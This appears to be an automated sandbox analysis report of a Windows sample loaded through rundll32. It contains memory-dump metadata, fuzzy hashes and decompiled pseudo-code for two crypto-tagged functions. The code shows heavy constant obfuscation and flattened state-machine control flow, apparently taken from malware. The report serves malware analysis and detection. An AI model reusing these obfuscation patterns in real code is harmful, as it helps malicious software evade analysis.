                                                                                                                      0x00000000
                                                                                                                      0x002d119f
                                                                                                                      0x002d10c5
                                                                                                                      0x002d10cb
                                                                                                                      0x002d116d
                                                                                                                      0x002d1173
                                                                                                                      0x002d1178
                                                                                                                      0x00000000
                                                                                                                      0x002d10d1
                                                                                                                      0x002d10d7
                                                                                                                      0x002d114e
                                                                                                                      0x002d1153
                                                                                                                      0x002d1158
                                                                                                                      0x002d115a
                                                                                                                      0x002d115a
                                                                                                                      0x002d115d
                                                                                                                      0x002d115d
                                                                                                                      0x002d115d
                                                                                                                      0x002d1160
                                                                                                                      0x002d1160
                                                                                                                      0x00000000
                                                                                                                      0x002d10d9
                                                                                                                      0x002d10df
                                                                                                                      0x002d112b
                                                                                                                      0x002d1130
                                                                                                                      0x002d1133
                                                                                                                      0x002d1137
                                                                                                                      0x002d1139
                                                                                                                      0x002d1145
                                                                                                                      0x00000000
                                                                                                                      0x002d10e1
                                                                                                                      0x002d10e7
                                                                                                                      0x002d1282
                                                                                                                      0x002d10ed
                                                                                                                      0x002d10f3
                                                                                                                      0x002d1261
                                                                                                                      0x002d1261
                                                                                                                      0x002d1267
                                                                                                                      0x002d11a4
                                                                                                                      0x002d11a4
                                                                                                                      0x002d1164
                                                                                                                      0x00000000
                                                                                                                      0x002d1164
                                                                                                                      0x002d10f9
                                                                                                                      0x002d10fb
                                                                                                                      0x002d1103
                                                                                                                      0x00000000
                                                                                                                      0x002d1103
                                                                                                                      0x002d10f3
                                                                                                                      0x002d10e7
                                                                                                                      0x002d10df
                                                                                                                      0x002d10d7
                                                                                                                      0x002d10cb
                                                                                                                      0x002d128a
                                                                                                                      0x002d1296
                                                                                                                      0x002d129a
                                                                                                                      0x002d129f
                                                                                                                      0x002d12a7
                                                                                                                      0x002d12a7
                                                                                                                      0x002d11aa
                                                                                                                      0x002d11b1
                                                                                                                      0x002d11c2
                                                                                                                      0x002d11c9
                                                                                                                      0x002d11ce
                                                                                                                      0x002d11d2
                                                                                                                      0x002d11e1
                                                                                                                      0x002d11e4
                                                                                                                      0x002d120f
                                                                                                                      0x002d1227
                                                                                                                      0x002d1230
                                                                                                                      0x002d123e
                                                                                                                      0x002d1242
                                                                                                                      0x002d1245
                                                                                                                      0x002d1248
                                                                                                                      0x002d1251
                                                                                                                      0x002d125a
                                                                                                                      0x002d125a
                                                                                                                      0x002d125d
                                                                                                                      0x00000000
                                                                                                                      0x002d125d
                                                                                                                      0x002d10ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-2971758746
                                                                                                                      • Opcode ID: 1883e29f52db3f2b5c5d6ad4d7d82ab239e0cc61d9bfdf08a25d41be58f52993
                                                                                                                      • Instruction ID: a719ab0bde6c8ecee2597cc3ef63450f0cbbfb3e88941ba16744d3670f170527
                                                                                                                      • Opcode Fuzzy Hash: 1883e29f52db3f2b5c5d6ad4d7d82ab239e0cc61d9bfdf08a25d41be58f52993
                                                                                                                      • Instruction Fuzzy Hash: 96D16FB11183819FC368CF65C48995BBBE1FBC4748F108A1DF6DA8A260D3B5D959CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B2830 Relevance: 7.8, Strings: 6, Instructions: 270COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B2830() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				unsigned int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t307;
				void* _t311;
				void* _t312;
				void* _t314;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t354;
				void* _t361;
				signed int* _t365;

				_t365 =  &_v1168;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0xd27b82;
				_v1132 = 0xd68ad;
				_t317 = 0x39;
				_t361 = 0x31951cf;
				_v1132 = _v1132 / _t317;
				_v1132 = _v1132 | 0x7a114e95;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 ^ 0x003f4f84;
				_v1164 = 0x8948b3;
				_v1164 = _v1164 + 0x5689;
				_v1164 = _v1164 + 0xffffbb3a;
				_t318 = 0x19;
				_v1164 = _v1164 * 0x56;
				_v1164 = _v1164 ^ 0x2e2b97d6;
				_v1072 = 0xcb9c2b;
				_v1072 = _v1072 >> 3;
				_v1072 = _v1072 ^ 0x001ca36a;
				_v1080 = 0x1dbdae;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x00014686;
				_v1156 = 0xb5510a;
				_v1156 = _v1156 / _t318;
				_v1156 = _v1156 ^ 0xc10914df;
				_v1156 = _v1156 | 0x9ca0ebe9;
				_v1156 = _v1156 ^ 0xdda118ad;
				_v1104 = 0x66b826;
				_v1104 = _v1104 ^ 0xe9987981;
				_v1104 = _v1104 * 0x25;
				_v1104 = _v1104 ^ 0xd1d8b52b;
				_v1056 = 0xa9a3d5;
				_v1056 = _v1056 * 0x6e;
				_v1056 = _v1056 ^ 0x48e0209e;
				_v1064 = 0xff8e1d;
				_v1064 = _v1064 + 0x7d6c;
				_v1064 = _v1064 ^ 0x0102ce02;
				_v1060 = 0x1cd25;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x00092955;
				_v1112 = 0x2e454b;
				_v1112 = _v1112 ^ 0xdfc484a9;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0xfea80718;
				_v1084 = 0x44c343;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0x99776358;
				_v1084 = _v1084 ^ 0x804f0a92;
				_v1148 = 0xd43471;
				_v1148 = _v1148 << 0x10;
				_v1148 = _v1148 ^ 0xf30ce1ba;
				_v1148 = _v1148 | 0x5684f5e4;
				_v1148 = _v1148 ^ 0xd7f82c28;
				_v1140 = 0xc6d087;
				_v1140 = _v1140 * 0xf;
				_v1140 = _v1140 / _t318;
				_t319 = 0x11;
				_v1140 = _v1140 / _t319;
				_v1140 = _v1140 ^ 0x000f807a;
				_v1076 = 0xeb33ff;
				_v1076 = _v1076 | 0x3caa7413;
				_v1076 = _v1076 ^ 0x3ce1a50e;
				_v1160 = 0xf6df2e;
				_v1160 = _v1160 << 3;
				_t320 = 0x12;
				_v1160 = _v1160 / _t320;
				_t321 = 0x23;
				_v1160 = _v1160 / _t321;
				_v1160 = _v1160 ^ 0x0001c97f;
				_v1096 = 0x2990f1;
				_v1096 = _v1096 + 0x8b3d;
				_v1096 = _v1096 << 4;
				_v1096 = _v1096 ^ 0x02a87cfa;
				_v1168 = 0x9204f1;
				_v1168 = _v1168 << 2;
				_v1168 = _v1168 >> 0xe;
				_v1168 = _v1168 ^ 0x6a27e144;
				_v1168 = _v1168 ^ 0x6a24f645;
				_v1068 = 0x63146e;
				_v1068 = _v1068 + 0xffffb906;
				_v1068 = _v1068 ^ 0x00673218;
				_v1124 = 0xa7a9d5;
				_v1124 = _v1124 * 0x43;
				_v1124 = _v1124 + 0xa631;
				_v1124 = _v1124 ^ 0x2beabd88;
				_v1144 = 0x5bd0aa;
				_v1144 = _v1144 * 6;
				_v1144 = _v1144 | 0x1ea27ebc;
				_v1144 = _v1144 + 0xffff7d79;
				_v1144 = _v1144 ^ 0x1eab8d23;
				_v1152 = 0x75499f;
				_v1152 = _v1152 >> 7;
				_v1152 = _v1152 * 0x3b;
				_v1152 = _v1152 * 0x36;
				_v1152 = _v1152 ^ 0x0b6e0547;
				_v1116 = 0xfc11ad;
				_v1116 = _v1116 ^ 0xa8b58fc5;
				_v1116 = _v1116 * 0x46;
				_v1116 = _v1116 ^ 0x042cd8c8;
				_v1088 = 0x98b2ad;
				_v1088 = _v1088 + 0x5f8d;
				_v1088 = _v1088 << 8;
				_v1088 = _v1088 ^ 0x99161df3;
				_v1108 = 0xc44bb5;
				_v1108 = _v1108 + 0xffff808c;
				_v1108 = _v1108 ^ 0x7a0d028c;
				_v1108 = _v1108 ^ 0x7ac2537a;
				_v1128 = 0x834e58;
				_v1128 = _v1128 + 0xffff18d5;
				_v1128 = _v1128 << 0xe;
				_v1128 = _v1128 + 0xe46a;
				_v1128 = _v1128 ^ 0x99c7b134;
				_v1136 = 0xd0608e;
				_v1136 = _v1136 << 0xd;
				_v1136 = _v1136 ^ 0x0f37e4e4;
				_v1136 = _v1136 ^ 0x0bc0752d;
				_v1136 = _v1136 ^ 0x08ebd133;
				_v1120 = 0xe37477;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 << 0x10;
				_v1120 = _v1120 ^ 0x800d4304;
				_v1092 = 0xa7d287;
				_v1092 = _v1092 * 0x3e;
				_v1092 = _v1092 << 0xb;
				_v1092 = _v1092 ^ 0x27ebbc9f;
				_v1100 = 0xbdc4ed;
				_v1100 = _v1100 << 8;
				_t322 = 0x37;
				_v1100 = _v1100 / _t322;
				_v1100 = _v1100 ^ 0x03761b38;
				_t307 = E002D074A();
				do {
					while(_t361 != 0x31951cf) {
						if(_t361 == 0x3cad130) {
							_push( &_v1040);
							_push( &_v520);
							_push(_v1100);
							return E002B8D95(_v1120, _v1092, __eflags);
						}
						if(_t361 == 0xac73e1e) {
							_push(_v1068);
							_push(_v1168);
							_push(0x2b113c);
							_t311 = E002BAB66(_v1160, _v1096, __eflags);
							_t312 = E002B5AE2(_v1124);
							_t354 =  *0x2d520c; // 0x0
							_t266 = _t354 + 0x220; // 0x220
							_t268 = _t354 + 8; // 0x8
							E002CD37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
							_t307 = E002BAE03(_v1108, _v1128, _v1136, _t311);
							_t365 =  &(_t365[0xd]);
							_t361 = 0x3cad130;
							continue;
						}
						_t373 = _t361 - 0xc947a3e;
						if(_t361 != 0xc947a3e) {
							goto L8;
						}
						_push(_v1104);
						_push(_v1156);
						_push(0x2b10cc);
						_t314 = E002BAB66(_v1072, _v1080, _t373);
						_t332 =  *0x2d520c; // 0x0
						_t334 =  *0x2d520c; // 0x0
						E002BE7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
						_t307 = E002BAE03(_v1148, _v1140, _v1076, _t314);
						_t365 =  &(_t365[0xd]);
						_t361 = 0xac73e1e;
					}
					_t361 = 0xc947a3e;
					L8:
					__eflags = _t361 - 0x9b97ca4;
				} while (__eflags != 0);
				return _t307;
			}




















































                                                                                                                      0x002b2830
                                                                                                                      0x002b2836
                                                                                                                      0x002b283d
                                                                                                                      0x002b2842
                                                                                                                      0x002b284a
                                                                                                                      0x002b285c
                                                                                                                      0x002b2861
                                                                                                                      0x002b2866
                                                                                                                      0x002b286a
                                                                                                                      0x002b2872
                                                                                                                      0x002b2877
                                                                                                                      0x002b287f
                                                                                                                      0x002b2887
                                                                                                                      0x002b288f
                                                                                                                      0x002b289e
                                                                                                                      0x002b28a1
                                                                                                                      0x002b28a5
                                                                                                                      0x002b28ad
                                                                                                                      0x002b28b5
                                                                                                                      0x002b28ba
                                                                                                                      0x002b28c2
                                                                                                                      0x002b28ca
                                                                                                                      0x002b28cf
                                                                                                                      0x002b28d7
                                                                                                                      0x002b28e7
                                                                                                                      0x002b28eb
                                                                                                                      0x002b28f3
                                                                                                                      0x002b28fb
                                                                                                                      0x002b2903
                                                                                                                      0x002b290b
                                                                                                                      0x002b2918
                                                                                                                      0x002b291c
                                                                                                                      0x002b2924
                                                                                                                      0x002b2937
                                                                                                                      0x002b293e
                                                                                                                      0x002b2949
                                                                                                                      0x002b2951
                                                                                                                      0x002b2959
                                                                                                                      0x002b2961
                                                                                                                      0x002b296c
                                                                                                                      0x002b2974
                                                                                                                      0x002b297f
                                                                                                                      0x002b2987
                                                                                                                      0x002b298f
                                                                                                                      0x002b2994
                                                                                                                      0x002b299c
                                                                                                                      0x002b29a9
                                                                                                                      0x002b29ad
                                                                                                                      0x002b29b5
                                                                                                                      0x002b29bd
                                                                                                                      0x002b29c5
                                                                                                                      0x002b29ca
                                                                                                                      0x002b29d2
                                                                                                                      0x002b29da
                                                                                                                      0x002b29e2
                                                                                                                      0x002b29ef
                                                                                                                      0x002b29fb
                                                                                                                      0x002b2a03
                                                                                                                      0x002b2a06
                                                                                                                      0x002b2a0c
                                                                                                                      0x002b2a14
                                                                                                                      0x002b2a1c
                                                                                                                      0x002b2a24
                                                                                                                      0x002b2a2c
                                                                                                                      0x002b2a34
                                                                                                                      0x002b2a3f
                                                                                                                      0x002b2a44
                                                                                                                      0x002b2a4e
                                                                                                                      0x002b2a51
                                                                                                                      0x002b2a55
                                                                                                                      0x002b2a5d
                                                                                                                      0x002b2a65
                                                                                                                      0x002b2a6d
                                                                                                                      0x002b2a72
                                                                                                                      0x002b2a7a
                                                                                                                      0x002b2a82
                                                                                                                      0x002b2a87
                                                                                                                      0x002b2a8c
                                                                                                                      0x002b2a94
                                                                                                                      0x002b2a9c
                                                                                                                      0x002b2aa4
                                                                                                                      0x002b2aac
                                                                                                                      0x002b2ab4
                                                                                                                      0x002b2ac1
                                                                                                                      0x002b2ac5
                                                                                                                      0x002b2acd
                                                                                                                      0x002b2ad5
                                                                                                                      0x002b2ae2
                                                                                                                      0x002b2ae6
                                                                                                                      0x002b2aee
                                                                                                                      0x002b2af6
                                                                                                                      0x002b2afe
                                                                                                                      0x002b2b06
                                                                                                                      0x002b2b10
                                                                                                                      0x002b2b19
                                                                                                                      0x002b2b1d
                                                                                                                      0x002b2b25
                                                                                                                      0x002b2b2d
                                                                                                                      0x002b2b3a
                                                                                                                      0x002b2b3e
                                                                                                                      0x002b2b46
                                                                                                                      0x002b2b4e
                                                                                                                      0x002b2b56
                                                                                                                      0x002b2b5b
                                                                                                                      0x002b2b63
                                                                                                                      0x002b2b6b
                                                                                                                      0x002b2b73
                                                                                                                      0x002b2b7b
                                                                                                                      0x002b2b83
                                                                                                                      0x002b2b8b
                                                                                                                      0x002b2b93
                                                                                                                      0x002b2b98
                                                                                                                      0x002b2ba0
                                                                                                                      0x002b2ba8
                                                                                                                      0x002b2bb0
                                                                                                                      0x002b2bb5
                                                                                                                      0x002b2bbd
                                                                                                                      0x002b2bc5
                                                                                                                      0x002b2bcd
                                                                                                                      0x002b2bd5
                                                                                                                      0x002b2bda
                                                                                                                      0x002b2bdf
                                                                                                                      0x002b2be7
                                                                                                                      0x002b2bf4
                                                                                                                      0x002b2bf8
                                                                                                                      0x002b2bfd
                                                                                                                      0x002b2c07
                                                                                                                      0x002b2c0f
                                                                                                                      0x002b2c1a
                                                                                                                      0x002b2c1d
                                                                                                                      0x002b2c21
                                                                                                                      0x002b2c31
                                                                                                                      0x002b2c45
                                                                                                                      0x002b2c45
                                                                                                                      0x002b2c53
                                                                                                                      0x002b2d77
                                                                                                                      0x002b2d7f
                                                                                                                      0x002b2d80
                                                                                                                      0x00000000
                                                                                                                      0x002b2d91
                                                                                                                      0x002b2c5b
                                                                                                                      0x002b2cea
                                                                                                                      0x002b2cee
                                                                                                                      0x002b2cfa
                                                                                                                      0x002b2cff
                                                                                                                      0x002b2d0d
                                                                                                                      0x002b2d16
                                                                                                                      0x002b2d1c
                                                                                                                      0x002b2d2b
                                                                                                                      0x002b2d3f
                                                                                                                      0x002b2d51
                                                                                                                      0x002b2d56
                                                                                                                      0x002b2d59
                                                                                                                      0x00000000
                                                                                                                      0x002b2d59
                                                                                                                      0x002b2c61
                                                                                                                      0x002b2c63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b2c69
                                                                                                                      0x002b2c6d
                                                                                                                      0x002b2c79
                                                                                                                      0x002b2c7e
                                                                                                                      0x002b2c83
                                                                                                                      0x002b2cae
                                                                                                                      0x002b2cc6
                                                                                                                      0x002b2cdb
                                                                                                                      0x002b2ce0
                                                                                                                      0x002b2ce3
                                                                                                                      0x002b2ce3
                                                                                                                      0x002b2d60
                                                                                                                      0x002b2d62
                                                                                                                      0x002b2d62
                                                                                                                      0x002b2d62
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: a5977f1ae5e7b0bb4287e001ca0eb3f61c22942d260ac4eebe5822d60686d2a2
                                                                                                                      • Instruction ID: e88298f9efc90412db0381e49ac13b744a62bf118ea9c0fe2cf76d31d5f462fc
                                                                                                                      • Opcode Fuzzy Hash: a5977f1ae5e7b0bb4287e001ca0eb3f61c22942d260ac4eebe5822d60686d2a2
                                                                                                                      • Instruction Fuzzy Hash: 5CD120714183819FC368CF65C58A94BFBF1BBC5748F508A1DF2EA96260D7B58918CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C129C Relevance: 7.8, Strings: 6, Instructions: 266COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002C129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v20;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t225;
				signed int _t257;
				signed int* _t258;
				void* _t260;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int* _t305;
				void* _t308;

				_t302 = _a8;
				_t258 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002BCF25(_t225);
				_v20 = 0x578391;
				_t305 =  &(( &_v164)[4]);
				asm("stosd");
				_t260 = 0x3e847b6;
				asm("stosd");
				asm("stosd");
				_v136 = 0x7901e7;
				_v136 = _v136 ^ 0x0e05b978;
				_v136 = _v136 | 0x8500df2f;
				_v136 = _v136 ^ 0x8f7cffbf;
				_v72 = 0x5c6105;
				_v72 = _v72 ^ 0xba418fb0;
				_v72 = _v72 ^ 0xba16afcf;
				_v156 = 0xc57f64;
				_v156 = _v156 << 0xe;
				_v156 = _v156 | 0xac310e4c;
				_t295 = 0x48;
				_v156 = _v156 / _t295;
				_v156 = _v156 ^ 0x038a2108;
				_v100 = 0xf9dfe5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x0009d912;
				_v112 = 0xb5688b;
				_t296 = 0x3d;
				_v112 = _v112 / _t296;
				_v112 = _v112 ^ 0x00064c77;
				_v116 = 0x80f1cc;
				_v116 = _v116 + 0xfffff23f;
				_v116 = _v116 ^ 0x008ab174;
				_v92 = 0xc78857;
				_v92 = _v92 | 0x5f9c477c;
				_v92 = _v92 ^ 0x5fdf5dba;
				_v148 = 0x3d8773;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 | 0x15c33ced;
				_v148 = _v148 + 0xffff6977;
				_v148 = _v148 ^ 0x15c9e03a;
				_v140 = 0x8050fd;
				_v140 = _v140 + 0xffffb165;
				_v140 = _v140 ^ 0xb13fe806;
				_v140 = _v140 ^ 0xb1b5a353;
				_v104 = 0x3fa35;
				_v104 = _v104 ^ 0x0635ab8b;
				_v104 = _v104 ^ 0x0638ddfb;
				_v128 = 0x6276d2;
				_v128 = _v128 * 0x67;
				_v128 = _v128 >> 7;
				_v128 = _v128 ^ 0x004624e6;
				_v84 = 0xb2127e;
				_v84 = _v84 ^ 0xdd4df2db;
				_v84 = _v84 ^ 0xddf0f9d7;
				_v108 = 0x825106;
				_v108 = _v108 + 0x54ee;
				_v108 = _v108 ^ 0x00831379;
				_v96 = 0x675ffa;
				_v96 = _v96 + 0xffff86b7;
				_v96 = _v96 ^ 0x0064c66c;
				_v132 = 0x78c111;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 + 0xffff7c58;
				_v132 = _v132 ^ 0xfff3b3ba;
				_v164 = 0xbe0848;
				_t297 = 0x46;
				_v164 = _v164 / _t297;
				_v164 = _v164 << 4;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x00009249;
				_v152 = 0xd46630;
				_v152 = _v152 | 0x25786146;
				_v152 = _v152 << 6;
				_t298 = 0x4f;
				_v152 = _v152 / _t298;
				_v152 = _v152 ^ 0x0191f926;
				_v144 = 0xf6674c;
				_v144 = _v144 >> 6;
				_v144 = _v144 ^ 0xb535724d;
				_v144 = _v144 ^ 0xb53e6a0f;
				_v160 = 0x2a1e3b;
				_v160 = _v160 >> 5;
				_t299 = 0x76;
				_v160 = _v160 / _t299;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x00046312;
				_v120 = 0xf44552;
				_v120 = _v120 + 0xbd95;
				_v120 = _v120 ^ 0x00f02cb9;
				_v76 = 0x9a2b11;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x2684a730;
				_v80 = 0x6aeef9;
				_t300 = 0x51;
				_v80 = _v80 / _t300;
				_v80 = _v80 ^ 0x000c464e;
				_v124 = 0x84a5f5;
				_v124 = _v124 << 5;
				_v124 = _v124 + 0xddfe;
				_v124 = _v124 ^ 0x10975fd7;
				_v88 = 0xa441a9;
				_v88 = _v88 + 0x5567;
				_v88 = _v88 ^ 0x00aef9b7;
				goto L1;
				do {
					while(1) {
						L1:
						_t308 = _t260 - 0x8801db7;
						if(_t308 > 0) {
							break;
						}
						if(_t308 == 0) {
							E002CF88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
						} else {
							if(_t260 == 0x235eed) {
								E002C4D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
								_t305 =  &(_t305[2]);
								_t260 = 0x85d9450;
								continue;
							} else {
								if(_t260 == 0x3e847b6) {
									_t260 = 0xab5e479;
									 *_t258 =  *_t258 & 0x00000000;
									_t258[1] = _v136;
									continue;
								} else {
									if(_t260 == 0x6ea21eb) {
										E002C4D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
										_t305 =  &(_t305[2]);
										_t260 = 0x9265c01;
										continue;
									} else {
										if(_t260 == 0x80db57c) {
											E002C4D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
											_t305 =  &(_t305[2]);
											_t260 = 0x8801db7;
											continue;
										} else {
											if(_t260 != 0x85d9450) {
												goto L24;
											} else {
												E002C4D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
												_t305 =  &(_t305[2]);
												_t260 = 0x80db57c;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t258;
						_t224 =  *_t258 != 0;
						__eflags = _t224;
						return 0 | _t224;
					}
					__eflags = _t260 - 0x9265c01;
					if(_t260 == 0x9265c01) {
						E002C4D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
						_t305 =  &(_t305[2]);
						_t260 = 0x235eed;
						goto L24;
					} else {
						__eflags = _t260 - 0xa20e3fb;
						if(__eflags == 0) {
							E002CF88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
							_t305 =  &(_t305[3]);
							_t260 = 0x6ea21eb;
							goto L1;
						} else {
							__eflags = _t260 - 0xab5e479;
							if(_t260 == 0xab5e479) {
								_t258[1] = E002D146E(_t302);
								_t260 = 0xffaf556;
								goto L1;
							} else {
								__eflags = _t260 - 0xf4853c6;
								if(_t260 == 0xf4853c6) {
									E002C64C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
									_t305 =  &(_t305[4]);
									_t260 = 0xa20e3fb;
									goto L1;
								} else {
									__eflags = _t260 - 0xffaf556;
									if(_t260 != 0xffaf556) {
										goto L24;
									} else {
										_push(_t260);
										_push(_t260);
										_t257 = E002C3512(_t258[1]);
										 *_t258 = _t257;
										__eflags = _t257;
										if(__eflags != 0) {
											_t260 = 0xf4853c6;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t260 - 0x1d5478a;
				} while (__eflags != 0);
				goto L27;
			}










































                                                                                                                      0x002c12a5
                                                                                                                      0x002c12ac
                                                                                                                      0x002c12af
                                                                                                                      0x002c12b0
                                                                                                                      0x002c12b8
                                                                                                                      0x002c12b9
                                                                                                                      0x002c12be
                                                                                                                      0x002c12d2
                                                                                                                      0x002c12d5
                                                                                                                      0x002c12d8
                                                                                                                      0x002c12df
                                                                                                                      0x002c12e0
                                                                                                                      0x002c12e1
                                                                                                                      0x002c12e9
                                                                                                                      0x002c12f1
                                                                                                                      0x002c12f9
                                                                                                                      0x002c1301
                                                                                                                      0x002c1309
                                                                                                                      0x002c1311
                                                                                                                      0x002c1319
                                                                                                                      0x002c1321
                                                                                                                      0x002c1326
                                                                                                                      0x002c1332
                                                                                                                      0x002c1337
                                                                                                                      0x002c133d
                                                                                                                      0x002c1345
                                                                                                                      0x002c134d
                                                                                                                      0x002c1352
                                                                                                                      0x002c135a
                                                                                                                      0x002c1366
                                                                                                                      0x002c1369
                                                                                                                      0x002c136d
                                                                                                                      0x002c1375
                                                                                                                      0x002c137d
                                                                                                                      0x002c1385
                                                                                                                      0x002c138d
                                                                                                                      0x002c1395
                                                                                                                      0x002c139d
                                                                                                                      0x002c13a5
                                                                                                                      0x002c13ad
                                                                                                                      0x002c13b2
                                                                                                                      0x002c13ba
                                                                                                                      0x002c13c2
                                                                                                                      0x002c13ca
                                                                                                                      0x002c13d2
                                                                                                                      0x002c13da
                                                                                                                      0x002c13e2
                                                                                                                      0x002c13ea
                                                                                                                      0x002c13f2
                                                                                                                      0x002c13fa
                                                                                                                      0x002c1402
                                                                                                                      0x002c140f
                                                                                                                      0x002c1413
                                                                                                                      0x002c1418
                                                                                                                      0x002c1420
                                                                                                                      0x002c1428
                                                                                                                      0x002c1430
                                                                                                                      0x002c1438
                                                                                                                      0x002c1440
                                                                                                                      0x002c1448
                                                                                                                      0x002c1450
                                                                                                                      0x002c1458
                                                                                                                      0x002c1460
                                                                                                                      0x002c1468
                                                                                                                      0x002c1470
                                                                                                                      0x002c1475
                                                                                                                      0x002c147f
                                                                                                                      0x002c148c
                                                                                                                      0x002c149a
                                                                                                                      0x002c149f
                                                                                                                      0x002c14a5
                                                                                                                      0x002c14aa
                                                                                                                      0x002c14af
                                                                                                                      0x002c14b7
                                                                                                                      0x002c14bf
                                                                                                                      0x002c14c7
                                                                                                                      0x002c14d0
                                                                                                                      0x002c14d5
                                                                                                                      0x002c14db
                                                                                                                      0x002c14e3
                                                                                                                      0x002c14eb
                                                                                                                      0x002c14f0
                                                                                                                      0x002c14f8
                                                                                                                      0x002c1500
                                                                                                                      0x002c1508
                                                                                                                      0x002c1511
                                                                                                                      0x002c1516
                                                                                                                      0x002c151c
                                                                                                                      0x002c1521
                                                                                                                      0x002c1529
                                                                                                                      0x002c1531
                                                                                                                      0x002c1539
                                                                                                                      0x002c1541
                                                                                                                      0x002c1549
                                                                                                                      0x002c154e
                                                                                                                      0x002c1556
                                                                                                                      0x002c1562
                                                                                                                      0x002c156a
                                                                                                                      0x002c156e
                                                                                                                      0x002c1576
                                                                                                                      0x002c157e
                                                                                                                      0x002c1583
                                                                                                                      0x002c158b
                                                                                                                      0x002c1593
                                                                                                                      0x002c159b
                                                                                                                      0x002c15a3
                                                                                                                      0x002c15a3
                                                                                                                      0x002c15ab
                                                                                                                      0x002c15ab
                                                                                                                      0x002c15ab
                                                                                                                      0x002c15ab
                                                                                                                      0x002c15ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c15b3
                                                                                                                      0x002c176b
                                                                                                                      0x002c15b9
                                                                                                                      0x002c15bf
                                                                                                                      0x002c1666
